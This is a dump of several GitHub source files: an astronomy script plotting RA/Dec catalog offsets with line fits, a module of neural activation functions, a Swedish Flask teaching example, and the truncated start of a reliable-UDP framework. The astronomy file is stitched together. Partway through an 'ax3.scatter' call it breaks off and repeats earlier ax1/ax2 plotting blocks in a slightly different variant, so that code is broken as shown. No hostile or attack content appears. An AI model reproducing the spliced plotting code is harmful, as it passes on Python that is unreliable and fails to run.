= 3.0\n \n #color code the points in and outside the area where transform is\n #valid, if the ra and dec limits are given.\n if 'ramin' in kwargs.keys():\n medradiff = np.median(radiff[iin])\n sigradiff = 1.4826 * mad(radiff[iin])\n #only take points within 3 sigma of the median\n ifit = iin & (abs(radiff - medradiff) < nsig_rej * sigradiff)\n inofit = iin & (abs(radiff - medradiff) >= nsig_rej * sigradiff)\n\n ax1.scatter(rarefm[iout], radiff[iout], color='y', edgecolors='k')\n ax1.scatter(rarefm[iin], radiff[iin], color='c', edgecolors='k')\n ax1.scatter(rarefm[ifit], radiff[ifit], color='b', edgecolors='k')\n\n ##fit line to data\n popt,pcov = curve_fit(flin, rarefm[ifit], radiff[ifit])\n else:\n medradiff = np.median(radiff)\n sigradiff = 1.4826 * mad(radiff)\n\n #only take points within 3 sigma of the median\n ifit = (abs(radiff - medradiff) < nsig_rej * sigradiff)\n inofit = (abs(radiff - medradiff) >= nsig_rej * sigradiff)\n\n ##fit line to data\n popt,pcov = curve_fit(flin, rarefm[ifit], radiff[ifit])\n ax1.scatter(rarefm, radiff, color='c', edgecolors='k')\n ax1.scatter(rarefm[ifit], radiff[ifit], color='b', edgecolors='k')\n\n #plot line fit\n slope= popt[0]\n yint = popt[1]\n print('slope = ',slope, 'yint = ', yint)\n xfit = np.array([min(rarefm),max(rarefm)])\n yfit = xfit * slope + yint\n ax1.plot(xfit,yfit,'g--')\n\n #print(1.002 * ralims[0],medradiff) \n #ax1.text(1.002 * ralims[0], 2.5, medradiff, color='r')\n labsize=14\n ax1.text(np.median(rarefm) - 3./60., 0.85*ypmax,\n r'median($\\Delta RA$) = ' + str(round(medradiff,2)), color='r',fontsize=labsize)\n ax1.text(np.median(rarefm) - 3./60., 0.7*ypmax,\n r'$\\sigma(\\Delta RA$) = ' + str(round(sigradiff,2)), color='r',fontsize=labsize)\n #compute change in delta RA over range in RA\n ax1.text(np.median(rarefm) - 3./60., 0.55*ypmax,\n r'$\\Delta_{tot} RA$ = ' + str(round((max(rarefm) - min(rarefm)) * slope,2)), color='r',fontsize=labsize)\n\n ax1.plot(ralims, yline, color='r')\n ax1.plot(ralims, yline1, color='r', linestyle = ':')\n ax1.plot(ralims, yline2, color='r', linestyle = ':')\n ax1.set_xlim(ralims)\n ax1.set_ylim([ypmin,ypmax])\n ax1.set_ylabel(r'\\Delta RA')\n\n #detrend data if keyword is set\n if detrend:\n radiffcor = radiff - (rarefm * slope + yint)\n ax1.scatter(rarefm[ifit],radiffcor[ifit], facecolors='none',edgecolor='m')\n medradiffcor = np.median(radiffcor[ifit])\n sigradiffcor = 1.4826 * mad(radiffcor)\n ax1.text(np.median(rarefm) - 3./60., 0.7*ypmin,\n r'median($\\Delta_{cor} RA$) = ' + str(round(medradiffcor,2)), color='m',fontsize=labsize)\n ax1.text(np.median(rarefm) - 3./60., 0.85*ypmin,\n r'$\\sigma(\\Delta_{cor} RA$) = ' + str(round(sigradiffcor,2)), color='m',fontsize=labsize)\n\n #rarefm, radiff\n\n #color code the points in and outside the area where transform is\n #valid, if the ra and dec limits are given.\n if 'ramin' in kwargs.keys():\n #only take points within 3 sigma of the median\n ifit = iin & (abs(radiff - medradiff) < nsig_rej * sigradiff)\n inofit = iin & (abs(radiff - medradiff) >= nsig_rej * sigradiff)\n\n ax2.scatter(decrefm[iout], radiff[iout], color='y', edgecolors='k')\n ax2.scatter(decrefm[iin], radiff[iin], color='c', edgecolors='k')\n ax2.scatter(decrefm[ifit], radiff[ifit], color='b', edgecolors='k')\n popt,pcov = curve_fit(flin, decrefm[ifit], radiff[ifit]) \n else:\n #only take points within 3 sigma of the median\n ifit = (abs(radiff - medradiff) < nsig_rej * sigradiff)\n inofit = (abs(radiff - medradiff) >= nsig_rej * sigradiff)\n\n ax2.scatter(decrefm, radiff, color='c', edgecolors='k')\n ax2.scatter(decrefm[ifit], radiff[ifit], color='b', edgecolors='k')\n popt,pcov = curve_fit(flin, decrefm[ifit], radiff[ifit])\n\n #plot line fit\n slope= popt[0]\n yint = popt[1]\n print('slope = ',slope, 'yint = ', yint)\n xfit = np.array([min(decrefm),max(decrefm)])\n yfit = xfit * slope + yint\n ax2.plot(xfit,yfit,'g--')\n\n #compute change in delta RA over range in DEC\n ax2.text(np.median(decrefm) - 3./60., 0.55*ypmax,\n r'$\\Delta_{tot} RA$ = ' + str(round((max(decrefm) - min(decrefm)) * slope,2)), color='r',fontsize=labsize)\n\n #ax2.scatter(decrefm, radiff)\n ax2.plot(declims, yline, color='r')\n ax2.plot(declims, yline1, color='r', linestyle = ':')\n ax2.plot(declims, yline2, color='r', linestyle = ':')\n #ax2.set_xticks(np.arange(min(decrefm), max(decrefm)+0.04, 0.04))\n ax2.xaxis.set_major_formatter(FormatStrFormatter('%.3f'))\n ax2.set_xlim(declims)\n ax2.set_ylim([ypmin,ypmax])\n\n\n #detrend data if keyword is set\n if detrend:\n radiffcor = radiff - (decrefm * slope + yint)\n ax2.scatter(decrefm[ifit],radiffcor[ifit], facecolors='none',edgecolor='m')\n medradiffcor = np.median(radiffcor[ifit])\n sigradiffcor = 1.4826 * mad(radiffcor)\n ax2.text(np.median(decrefm) - 3./60., 0.7*ypmin,\n r'median($\\Delta_{cor} RA$) = ' + str(round(medradiffcor,2)), color='m',fontsize=labsize)\n ax2.text(np.median(decrefm) - 3./60., 0.85*ypmin,\n r'$\\sigma(\\Delta_{cor} RA$) = ' + str(round(sigradiffcor,2)), color='m',fontsize=labsize)\n\n #color code the points in and outside the area where transform is\n #valid, if the ra and dec limits are given.\n if 'ramin' in kwargs.keys():\n meddecdiff = np.median(decdiff[iin])\n sigdecdiff = 1.4826 * mad(decdiff[iin])\n\n #only take points within 3 sigma of the median\n ifit = iin & (abs(decdiff - meddecdiff) < nsig_rej * sigdecdiff)\n inofit = iin & (abs(decdiff - meddecdiff) >= nsig_rej * sigdecdiff)\n\n ax3.scatter(rarefm[iout], 
color='r',fontsize=labsize)\n\n ax1.plot(ralims, yline, color='r')\n ax1.plot(ralims, yline1, color='r', linestyle = ':')\n ax1.plot(ralims, yline2, color='r', linestyle = ':')\n ax1.set_xlim(ralims)\n ax1.set_ylim([ypmin,ypmax])\n ax1.set_ylabel(r'\\Delta RA')\n\n #detrend data if keyword is set\n if detrend:\n radiffcor = radiff - (rarefm * slope + yint)\n ax1.scatter(rarefm[ifit],radiffcor[ifit], color='',edgecolor='m')\n medradiffcor = np.median(radiffcor[ifit])\n sigradiffcor = 1.4826 * mad(radiffcor)\n ax1.text(np.median(rarefm) - 3./60., 0.7*ypmin,\n r'median($\\Delta_{cor} RA$) = ' + str(round(medradiffcor,2)), color='m',fontsize=labsize)\n ax1.text(np.median(rarefm) - 3./60., 0.85*ypmin,\n r'$\\sigma(\\Delta_{cor} RA$) = ' + str(round(sigradiffcor,2)), color='m',fontsize=labsize)\n\n #rarefm, radiff\n\n #color code the points in and outside the area where transform is\n #valid, if the ra and dec limits are given.\n if 'ramin' in kwargs.keys():\n #only take points within 3 sigma of the median\n ifit = iin & (abs(radiff - medradiff) < nsig_rej * sigradiff)\n inofit = iin & (abs(radiff - medradiff) >= nsig_rej * sigradiff)\n\n ax2.scatter(decrefm[iout], radiff[iout], color='y', edgecolors='k')\n ax2.scatter(decrefm[iin], radiff[iin], color='c', edgecolors='k')\n ax2.scatter(decrefm[ifit], radiff[ifit], color='b', edgecolors='k')\n popt,pcov = curve_fit(flin, decrefm[ifit], radiff[ifit]) \n else:\n #only take points within 3 sigma of the median\n ifit = (abs(radiff - medradiff) < nsig_rej * sigradiff)\n inofit = (abs(radiff - medradiff) >= nsig_rej * sigradiff)\n\n ax2.scatter(decrefm, radiff, color='c', edgecolors='k')\n ax2.scatter(decrefm[ifit], radiff[ifit], color='b', edgecolors='k')\n popt,pcov = curve_fit(flin, decrefm[ifit], radiff[ifit])\n\n #plot line fit\n slope= popt[0]\n yint = popt[1]\n print('slope = ',slope, 'yint = ', yint)\n xfit = np.array([min(decrefm),max(decrefm)])\n yfit = xfit * slope + yint\n ax2.plot(xfit,yfit,'g--')\n\n #compute change in delta RA over range in DEC\n ax2.text(np.median(decrefm) - 3./60., 0.55*ypmax,\n r'$\\Delta_{tot} RA$ = ' + str(round((max(decrefm) - min(decrefm)) * slope,2)), color='r',fontsize=labsize)\n\n #ax2.scatter(decrefm, radiff)\n ax2.plot(declims, yline, color='r')\n ax2.plot(declims, yline1, color='r', linestyle = ':')\n ax2.plot(declims, yline2, color='r', linestyle = ':')\n #ax2.set_xticks(np.arange(min(decrefm), max(decrefm)+0.04, 0.04))\n ax2.xaxis.set_major_formatter(FormatStrFormatter('%.3f'))\n ax2.set_xlim(declims)\n ax2.set_ylim([ypmin,ypmax])\n\n\n #detrend data if keyword is set\n if detrend:\n radiffcor = radiff - (decrefm * slope + yint)\n ax2.scatter(decrefm[ifit],radiffcor[ifit], color='',edgecolor='m')\n medradiffcor = np.median(radiffcor[ifit])\n sigradiffcor = 1.4826 * mad(radiffcor)\n ax2.text(np.median(decrefm) - 3./60., 0.7*ypmin,\n r'median($\\Delta_{cor} RA$) = ' + str(round(medradiffcor,2)), color='m',fontsize=labsize)\n ax2.text(np.median(decrefm) - 3./60., 0.85*ypmin,\n r'$\\sigma(\\Delta_{cor} RA$) = ' + str(round(sigradiffcor,2)), color='m',fontsize=labsize)\n\n #color code the points in and outside the area where transform is\n #valid, if the ra and dec limits are given.\n if 'ramin' in kwargs.keys():\n meddecdiff = np.median(decdiff[iin])\n sigdecdiff = 1.4826 * mad(decdiff[iin])\n\n #only take points within 3 sigma of the median\n ifit = iin & (abs(decdiff - meddecdiff) < nsig_rej * sigdecdiff)\n inofit = iin & (abs(decdiff - meddecdiff) >= nsig_rej * sigdecdiff)\n\n ax3.scatter(rarefm[iout], 
decdiff[iout], color='y', edgecolors='k')\n ax3.scatter(rarefm[iin], decdiff[iin], color='c', edgecolors='k')\n ax3.scatter(rarefm[ifit], decdiff[ifit], color='b', edgecolors='k')\n ##fit line to data\n popt,pcov = curve_fit(flin, rarefm[ifit], decdiff[ifit])\n\n else:\n meddecdiff = np.median(decdiff)\n sigdecdiff = 1.4826 * mad(decdiff)\n\n #only take points within 3 sigma of the median\n ifit = (abs(decdiff - meddecdiff) < nsig_rej * sigdecdiff)\n inofit = (abs(decdiff - meddecdiff) >= nsig_rej * sigdecdiff)\n\n ax3.scatter(rarefm, decdiff, color='c', edgecolors='k')\n ax3.scatter(rarefm[ifit], decdiff[ifit], color='b', edgecolors='k')\n\n ##fit line to data\n popt,pcov = curve_fit(flin, rarefm[ifit], decdiff[ifit])\n\n\n #ax3.text(1.002 * ralims[0], 2.5, meddecdiff, color='r')\n ax3.text(np.median(rarefm) - 3./60., 0.85*ypmax,\n r'median($\\Delta Dec$) = ' + str(round(meddecdiff,2)), color='r',fontsize=labsize)\n ax3.text(np.median(rarefm) - 3./60., 0.7*ypmax,\n r'$\\sigma(\\Delta Dec$) = ' + str(round(sigdecdiff,2)), color='r',fontsize=labsize)\n\n #plot line fit\n slope= popt[0]\n yint = popt[1]\n print('slope = ',slope, 'yint = ', yint)\n xfit = np.array([min(rarefm),max(rarefm)])\n yfit = xfit * slope + yint\n ax3.plot(xfit,yfit,'g--')\n\n #compute change in delta DEC over range in RA\n ax3.text(np.median(rarefm) - 3./60., 0.55*ypmax,\n r'$\\Delta_{tot} Dec$ = ' + str(round((max(rarefm) - min(rarefm)) * slope,2)), color='r',fontsize=labsize)\n #ax3.scatter(rarefm, decdiff)\n ax3.plot(ralims, yline, color='r')\n ax3.plot(ralims, yline1, color='r', linestyle = ':')\n ax3.plot(ralims, yline2, color='r', linestyle = ':')\n ax3.set_xlim(ralims)\n ax3.set_ylim([ypmin,ypmax])\n ax3.set_xlabel(r'RA')\n ax3.set_ylabel(r'\\Delta Dec')\n \n if detrend:\n decdiffcor = decdiff - (rarefm * slope + yint)\n ax3.scatter(rarefm[ifit],decdiffcor[ifit], color='',edgecolor='m')\n meddecdiffcor = np.median(decdiffcor[ifit])\n sigdecdiffcor = 1.4826 * mad(decdiffcor)\n ax3.text(np.median(rarefm) - 3./60., 0.7*ypmin,\n r'median($\\Delta_{cor} Dec$) = ' + str(round(meddecdiffcor,2)), color='m',fontsize=labsize)\n ax3.text(np.median(rarefm) - 3./60., 0.85*ypmin,\n r'$\\sigma(\\Delta_{cor} Dec$) = ' + str(round(sigdecdiffcor,2)), color='m',fontsize=labsize)\n\n #color code the points in and outside the area where transform is\n #valid, if the ra and dec limits are given.\n if 'ramin' in kwargs.keys():\n #only take points within 3 sigma of the median\n ifit = iin & (abs(decdiff - meddecdiff) < nsig_rej * sigdecdiff)\n inofit = iin & (abs(decdiff - meddecdiff) >= nsig_rej * sigdecdiff)\n\n ax4.scatter(decrefm[iout], decdiff[iout], color='y', edgecolors='k')\n ax4.scatter(decrefm[iin], decdiff[iin], color='c', edgecolors='k')\n ax4.scatter(decrefm[ifit], decdiff[ifit], color='b', edgecolors='k')\n ##fit line to data\n popt,pcov = curve_fit(flin, decrefm[ifit], decdiff[ifit])\n\n else:\n #only take points within 3 sigma of the median\n ifit = (abs(decdiff - meddecdiff) < nsig_rej * sigdecdiff)\n inofit = (abs(decdiff - meddecdiff) >= nsig_rej * sigdecdiff)\n\n ax4.scatter(decrefm, decdiff, color='c', edgecolors='k')\n ax4.scatter(decrefm[ifit], decdiff[ifit], color='b', edgecolors='k')\n ##fit line to data\n popt,pcov = curve_fit(flin, decrefm[ifit], decdiff[ifit])\n\n #plot line fit\n slope= popt[0]\n yint = popt[1]\n print('slope = ',slope, 'yint = ', yint)\n xfit = np.array([min(decrefm),max(decrefm)])\n yfit = xfit * slope + yint\n ax4.plot(xfit,yfit,'g--')\n\n\n #compute change in delta DEC over range in 
DEC\n ax4.text(np.median(decrefm) - 3./60., 0.55*ypmax,\n r'$\\Delta_{tot} RA$ = ' + str(round((max(decrefm) - min(decrefm)) * slope,2)), color='r',fontsize=labsize)\n # ax4.scatter(decrefm, decdiff)\n ax4.plot(declims, yline, color='r')\n ax4.plot(declims, yline1, color='r', linestyle = ':')\n ax4.plot(declims, yline2, color='r', linestyle = ':')\n #ax4.set_xticks(np.arange(min(decrefm), max(decrefm)+0.04, 0.04))\n ax4.xaxis.set_major_formatter(FormatStrFormatter('%.3f'))\n ax4.set_xlim(declims)\n ax4.set_ylim([ypmin,ypmax])\n ax4.set_xlabel(r'Dec')\n\n if detrend:\n decdiffcor = decdiff - (decrefm * slope + yint)\n ax4.scatter(decrefm[ifit],decdiffcor[ifit], color='',edgecolor='m')\n meddecdiffcor = np.median(decdiffcor[ifit])\n sigdecdiffcor = 1.4826 * mad(decdiffcor)\n ax4.text(np.median(decrefm) - 3./60., 0.7*ypmin,\n r'median($\\Delta_{cor} Dec$) = ' + str(round(meddecdiffcor,2)), color='m',fontsize=labsize)\n ax4.text(np.median(decrefm) - 3./60., 0.85*ypmin,\n r'$\\sigma(\\Delta_{cor} Dec$) = ' + str(round(sigdecdiffcor,2)), color='m',fontsize=labsize)\n\n keys = sorted(kwargs.keys())\n for kw in keys:\n if kw == 'plotfile':\n plt.savefig(kwargs[kw])\n plt.show()\n #print(\"done with plot\")\n #plt.close()\n \n return medradiff, meddecdiff\n\n#function for a straight line fit\ndef flin(x,A,B):\n return A*x + B\n", "repo_name": "grudnick/Catalog_code", "sub_path": "catalog_match_sky_trans.py", "file_name": "catalog_match_sky_trans.py", "file_ext": "py", "file_size_in_byte": 16637, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "astropy.coordinates.SkyCoord", "line_number": 44, "usage_type": "call"}, {"api_name": "astropy.units.degree", "line_number": 44, "usage_type": "attribute"}, {"api_name": "astropy.units", "line_number": 44, "usage_type": "name"}, {"api_name": "astropy.coordinates.SkyCoord", "line_number": 45, "usage_type": "call"}, {"api_name": "astropy.units.degree", "line_number": 45, "usage_type": "attribute"}, {"api_name": "astropy.units", "line_number": 45, "usage_type": "name"}, {"api_name": "numpy.where", "line_number": 55, "usage_type": "call"}, {"api_name": "astropy.units.deg", "line_number": 55, "usage_type": "attribute"}, {"api_name": "astropy.units", "line_number": 55, "usage_type": "name"}, {"api_name": "numpy.amax", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.rc", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.rc", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}, {"api_name": "numpy.median", "line_number": 162, "usage_type": "call"}, {"api_name": "scipy.stats.median_abs_deviation", "line_number": 163, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 175, "usage_type": "call"}, 
{"api_name": "scipy.stats.median_abs_deviation", "line_number": 176, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 217, "usage_type": "call"}, {"api_name": "scipy.stats.median_abs_deviation", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 221, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 236, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 250, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 255, "usage_type": "call"}, {"api_name": "matplotlib.ticker.FormatStrFormatter", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 272, "usage_type": "call"}, {"api_name": "scipy.stats.median_abs_deviation", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 274, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 276, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 282, "usage_type": "call"}, {"api_name": "scipy.stats.median_abs_deviation", "line_number": 283, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 296, "usage_type": "call"}, {"api_name": "scipy.stats.median_abs_deviation", "line_number": 297, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 311, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 325, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 339, "usage_type": "call"}, {"api_name": "scipy.stats.median_abs_deviation", "line_number": 340, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 341, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 343, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 357, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 373, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 379, "usage_type": "call"}, {"api_name": "matplotlib.ticker.FormatStrFormatter", "line_number": 386, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 394, "usage_type": "call"}, {"api_name": "scipy.stats.median_abs_deviation", "line_number": 395, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 398, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 404, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 404, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 405, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 405, "usage_type": "name"}]}
+{"seq_id": "29353934987", "text": "# Grabbed from https://github.com/siebenrock/activation-functions/blob/master/activation_functions.ipynb to avoid keras dependency or whatever\nimport math\n\n\nACTIVATIONS = {'id':lambda x: x,\n 'pw':lambda x: 2*(1 if x > 3 else 0 if x < -3 else 1/6*x+1/2)-1.0,\n 'hs':lambda x: 1 if x > 0 else -1,\n 'sg':lambda x: 2*(1 / (1 + math.exp(-x)))-1.0,\n 'bs':lambda x: (1 - math.exp(-x)) / (1 + math.exp(-x)),\n 'ht':lambda x: 2 / (1 + math.exp(-2 * x)) -1,\n 'at':lambda x: (2/math.pi)*math.atan(x),\n 'st':lambda x: (2/math.pi)*math.atan(max(0.1 * x, x)),\n 'et':lambda x: (2/math.pi)*math.atan(x) if x > 0 else 0.5 * (math.exp(x) - 1)}\n\nINVERSE_ACTIVATIONS = {'id': lambda y: y,\n 'ht': lambda y: -0.5*math.log(2/(y+1)-1) if y<1 else 100000000,\n 'ln': lambda y: 5*(y-0.5) }\n\nif __name__=='__main__':\n import matplotlib.pyplot as plt\n x = [0.01*i for i in range(-500,500)]\n xf_interleaved = list()\n for ac,f in ACTIVATIONS.items():\n xf_interleaved.append(x)\n xf_interleaved.append([f(xi) for xi in x])\n plt.plot(*xf_interleaved)\n plt.legend(list(ACTIVATIONS.keys()))\n plt.show()\n print(math.atan(41))\n\n def one(x):\n y = ACTIVATIONS['ht'](x)\n return INVERSE_ACTIVATIONS['ht'](y)\n\n print(one(0.8))\n\n\n\n\n\n\n\n\n", "repo_name": "microprediction/recalibrate", "sub_path": "recalibrate/unarytransforms/activation.py", "file_name": "activation.py", "file_ext": "py", "file_size_in_byte": 1405, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "math.exp", "line_number": 8, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 9, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 10, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 11, "usage_type": "attribute"}, {"api_name": "math.atan", "line_number": 11, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 12, "usage_type": "attribute"}, {"api_name": "math.atan", "line_number": 12, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 13, "usage_type": "attribute"}, {"api_name": "math.atan", "line_number": 13, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 13, "usage_type": "call"}, {"api_name": "math.log", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "math.atan", "line_number": 29, "usage_type": "call"}]}
+{"seq_id": "20997979923", "text": "from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\ncities_list = [\"Göteborg\", \"Linköping\", \"Enköping\", \"Skövde\", \"Mölndal\"]\n\n#render_template letar efter html filer i /templates mappen.\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\", title=\"Kristians hemsida\", show_paragraph=True, cities=cities_list) #Jag kan skicka med olika typer av variabler i min render_template\n# det är render_template() som ser till att variablerna renderas in i html. Den kör igenom logiken och returnerar korrekt html. \n\n@app.route(\"/submit\", methods=[\"POST\"])\ndef submit():\n print(request.form[\"email\"]) #Data från formulär kommer du åt via request.form\n return \"Tack formuläret har skickats in!\"\n\n\"\"\"\n1. render_template(). Vilken mapp letar den i?\n2. variabler i template {{variable}}\n3. if-statements {% if condition %}\n4. for loops {% for item in list %}\n5. formulär\n\"\"\"", "repo_name": "kristiannilsson/python-course", "sub_path": "lektion6_templates/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 916, "program_lang": "python", "lang": "sv", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 3, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 10, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}]}
+{"seq_id": "8417764518", "text": "# A framework for reliable udp\r\n\r\nimport logging\r\nimport random\r\nimport socket\r\nimport struct\r\n\r\nfrom enum import IntEnum\r\nfrom utils import States\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\nmax_initial_sequence_no = 65536 * 1024\r\n\r\nclass ControlBits(IntEnum):\r\n FIN = 1\r\n SYN = 2\r\n RST = 4\r\n PSH = 8\r\n ACK = 16\r\n URG = 32\r\n ECE = 64\r\n CWR = 128\r\n\r\nclass OptionBits(IntEnum):\r\n END_OF_OPTION_LIST = 0\r\n NO_OPERATION = 1\r\n MAX_SEGMENT_SIZE = 2\r\n\r\n# unsupported option extensions\r\n# SACK\r\n# TIMESTAMP\r\n# WINDOW_SCALE\r\n \r\ndef calc_checksum(data: bytes) -> int:\r\n \"\"\"Calculates the TCP checksum for a byte array of data\"\"\"\r\n\r\n # The checksum field is the 16-bit ones' complement of the ones' complement sum of all 16-bit words in the\r\n # header and text. The checksum computation needs to ensure the 16-bit alignment of the data being\r\n # summed. If a segment contains an odd number of header and text octets, alignment can be achieved by\r\n # padding the last octet with zeros on its right to form a 16-bit word for checksum purposes. The pad is not\r\n # transmitted as part of the segment. While computing the checksum, the checksum field itself is replaced\r\n # with zeros.\r\n\r\n if len(data) % 2 == 1:\r\n # if the input is not aligned (2-byte) then add a null padding octet\r\n data += b\"\\x00\"\r\n\r\n # unpack the data into an array of unsigned shorts\r\n words = struct.unpack(\"!%dH\" % (len(data) // 2), data)\r\n # sum the unsigned shorts\r\n chksum = sum(words)\r\n # one's complement\r\n #chksum = ~chksum\r\n\r\n # this is the long way with bit rotation logic\r\n chksum = (chksum >> 16) + (chksum & 0xffff)\r\n chksum += chksum >> 16\r\n chksum = ~chksum & 0xffff\r\n\r\n return chksum\r\n\r\n\r\n\r\nclass Packet:\r\n def __init__(self, data: bytes, addr: tuple):\r\n # the 'tcp' header should be 20-octets\r\n if len(data) < 20:\r\n raise ValueError(f'error processing packet from {addr} of length {len(data)}')\r\n\r\n self.addr = addr\r\n (\r\n self.src_port,\r\n self.dst_port,\r\n self.seq_no,\r\n self.ack_no,\r\n offset_and_reserved,\r\n self.control_bits,\r\n self.window_size,\r\n self.checksum,\r\n self.urgent\r\n ) = struct.unpack(\"!HHIIBBHHH\", data[0:20])\r\n\r\n # offset\r\n self.offset = offset_and_reserved >> 4\r\n # reserved\r\n self.reserved = offset_and_reserved & 0x0f\r\n # there may be option data between 21 and 21 + offset\r\n doffset = 21 + self.offset\r\n # extract the options\r\n self.options = data[21:doffset]\r\n # extract the payload (if any)\r\n self.data = data[doffset:]\r\n \r\n def __repr__(self):\r\n return repr({\r\n 'addr' : self.addr,\r\n 'src_port' : self.src_port,\r\n 'dst_port' : self.dst_port,\r\n 'seq_no' : self.seq_no,\r\n 'ack_no' : self.ack_no,\r\n 'offset' : self.offset,\r\n 'reserved' : self.reserved,\r\n 'control' : self.control_bits,\r\n 'window_size' : self.window_size,\r\n 'checksum' : self.checksum,\r\n 'urgent' : self.urgent,\r\n 'options' : self.options,\r\n 'payload' : self.data\r\n })\r\n \r\n @property\r\n def is_syn(self):\r\n return (self.control_bits == ControlBits.SYN)\r\n\r\n @property\r\n def is_syn_ack(self):\r\n return (self.control_bits == (ControlBits.SYN | ControlBits.ACK))\r\n\r\n @property\r\n def is_ack(self):\r\n return (self.control_bits == ControlBits.ACK)\r\n\r\n @property\r\n def is_fin_ack(self):\r\n return (self.control_bits == (ControlBits.ACK | ControlBits.FIN))\r\n\r\n @property\r\n def is_fin(self):\r\n return 
(self.control_bits == ControlBits.FIN)\r\n\r\n# The connection object is a state machine that takes in packets\r\n# and applies them to the state machine.\r\n\r\nclass Connection:\r\n def __init__(self, sock: socket.socket, state: States):\r\n # the socket associated with this connection\r\n self.sock = sock\r\n # get the source information for this socket\r\n (self.src_addr, self.src_port) = self.sock.getsockname()\r\n # get the source inet\r\n self.src_inet = socket.inet_aton(self.src_addr)\r\n # the state of the connection\r\n self._state = state\r\n # window size - maximum window size for starters\r\n self.window_size = 65535\r\n # maximum segment size\r\n self.mss = 536 # default for ipv4\r\n\r\n def get_state(self):\r\n return self._state\r\n \r\n def set_state(self, value):\r\n logger.info(f'set_state({self.state}): {value}')\r\n self._state = value\r\n\r\n state = property(fget = get_state, fset = set_state)\r\n\r\n def pseudo_ip_header(self, segment_length):\r\n return (\r\n self.src_inet + \r\n self.dst_inet +\r\n b'\\x00\\x04' +\r\n segment_length.to_bytes(2, 'big')\r\n )\r\n\r\n def with_checksum(self, tcp_packet: bytes):\r\n # create the pseudo ip header\r\n ip_header = self.pseudo_ip_header(len(tcp_packet))\r\n # create checksum from the concatenated body parts\r\n tcp_checksum = calc_checksum(ip_header + tcp_packet)\r\n tcp_checksum = 